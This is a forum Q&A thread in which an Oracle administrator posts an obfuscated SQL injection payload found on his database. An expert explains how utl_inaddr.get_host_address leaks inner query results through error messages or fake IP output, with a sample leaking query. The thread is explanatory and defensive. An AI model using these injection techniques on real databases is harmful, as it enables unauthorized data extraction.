Solved

sql injection to select utl_inaddr.get_host_address and XS$CACHE_DELETE

Posted on 2014-01-15
7
1,603 Views
Last Modified: 2014-01-15
found that someone use sql injection to run this sql in my oracle database via web application. I don't get his purpose. why use utl_inaddr.get_host_address and number of columns in XS$CACHE_DELETE???

select utl_inaddr.get_host_address(((
SELECT CAST (COUNT (column_name) AS CHAR (10))
  FROM all_tab_columns
 WHERE table_name =
             CHR (88)
          || CHR (83)
          || CHR (36)
          || CHR (67)
          || CHR (65)
          || CHR (67)
          || CHR (72)
          || CHR (69)
          || CHR (95)
          || CHR (68)
          || CHR (69)
          || CHR (76)
          || CHR (69)
          || CHR (84)
          || CHR (69)
))) from dual

Open in new window

0
Comment
Question by:Hoboly
  • 4
  • 3
7 Comments
 
LVL 73

Assisted Solution

by:sdstuber
sdstuber earned 500 total points
ID: 39784466
Do you have a table called "XS$CACHE_DELETE"  ?


The purpose of using utl_inaddr.get_host_address  is a quirk of the error message returned by the function.  If the host name passed in produces an error, that "name" will be returned as part of the error

For example....

select utl_inaddr.get_host_address('something that will produce an error') from dual

ORA-29257: host something that will produce an error unknown
                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Open in new window


So, by nesting a query inside the function call , the query is executed and the output of the query is taken as a host name that will likely be illegal and generate an error.  Then that illegal text will be returned as part of the error message
0
 

Author Comment

by:Hoboly
ID: 39784470
no XS$DELETE
but these is a table XS$CACHE_DELETE

SQL> desc XS$CACHE_DELETE
 Name                                      Null?    Type
 ----------------------------------------- -------- ----------------------------
 OBJ_TYPE                                           NUMBER(2)
 NAME                                               VARCHAR2(4000)
 DEL_DATE                                  NOT NULL TIMESTAMP(6)

SQL>

should be standard oracle 11g table
0
 

Author Comment

by:Hoboly
ID: 39784471
thanks Sdstuber
but I don't get it why COUNT (column_name)  into utl_inaddr.get_host_address.
if he wants to get the ip, he can just use utl_inaddr.get_host_address(host name) instead of utl_inaddr.get_host_address(column count)
0
U.S. Department of Agriculture and Acronis Access

With the new era of mobile computing, smartphones and tablets, wireless communications and cloud services, the USDA sought to take advantage of a mobilized workforce and the blurring lines between personal and corporate computing resources.

 
LVL 73

Accepted Solution

by:
sdstuber earned 500 total points
ID: 39784476
He doesn't want an ip address, he wants the query results.
That's the key to the injection.  By failing you get to see the inner query results.
Or by constructing a query that returns a numeric result that number will appear as part of an ip address even though it really isn't one.


Try this...

SELECT UTL_INADDR.get_host_address(
           'There are ' || (SELECT COUNT(*) FROM dba_tables) || ' tables in this database'
       )
  FROM DUAL;

You should get an error something like this.
The 2923 will be vary based on your system.


ORA-29257: host There are 2923 tables in this database unknown



As I said above, the inner query is executed and the results are returned in the error.
0
 
LVL 73

Expert Comment

by:sdstuber
ID: 39784483
XS$CACHE_DELETE - sorry, I posted that then saw my mistake and corrected it.

I don't know of a specific hack to utilize that table or its contents; but it's mere existence would tell the hacker that XDB has been installed and that knowledge can provide a new attack vector.
0
 
LVL 73

Expert Comment

by:sdstuber
ID: 39784487
Actually, on further review of the initial query,  the error message part probably isn't going to happen.  Sorry for the confusion

If you run the injection query you should get either

0.0.0.0    -- meaning you do not have the table, i.e. XDB is not installed
 or
0.0.0.3    -- meaning you do have the table, i.e XDB is installed


Using the same technique though,  you can execute other queries and check the error messages to see what the results of those queries will be
0
 

Author Closing Comment

by:Hoboly
ID: 39784490
Excellent explanation! Thanks!
0

Featured Post

New My Cloud Pro Series - organize everything!

With space to keep virtually everything, the My Cloud Pro Series offers your team the network storage to edit, save and share production files from anywhere with an internet connection. Compatible with both Mac and PC, you're able to protect your content regardless of OS.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

If I have to fix slow responding website my first thoughts are server side optimizations: the database may not be optimized or caching is not enabled, or things like that. We often overlook another major part of our web application: the client. We o…
These days, all we hear about hacktivists took down so and so websites and retrieved thousands of user’s data. One of the techniques to get unauthorized access to database is by performing SQL injection. This article is quite lengthy which gives bas…
This video shows how to set up a shell script to accept a positional parameter when called, pass that to a SQL script, accept the output from the statement back and then manipulate it in the Shell.
This video shows how to recover a database from a user managed backup

947 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

22 Experts available now in Live!

Get 1:1 Help Now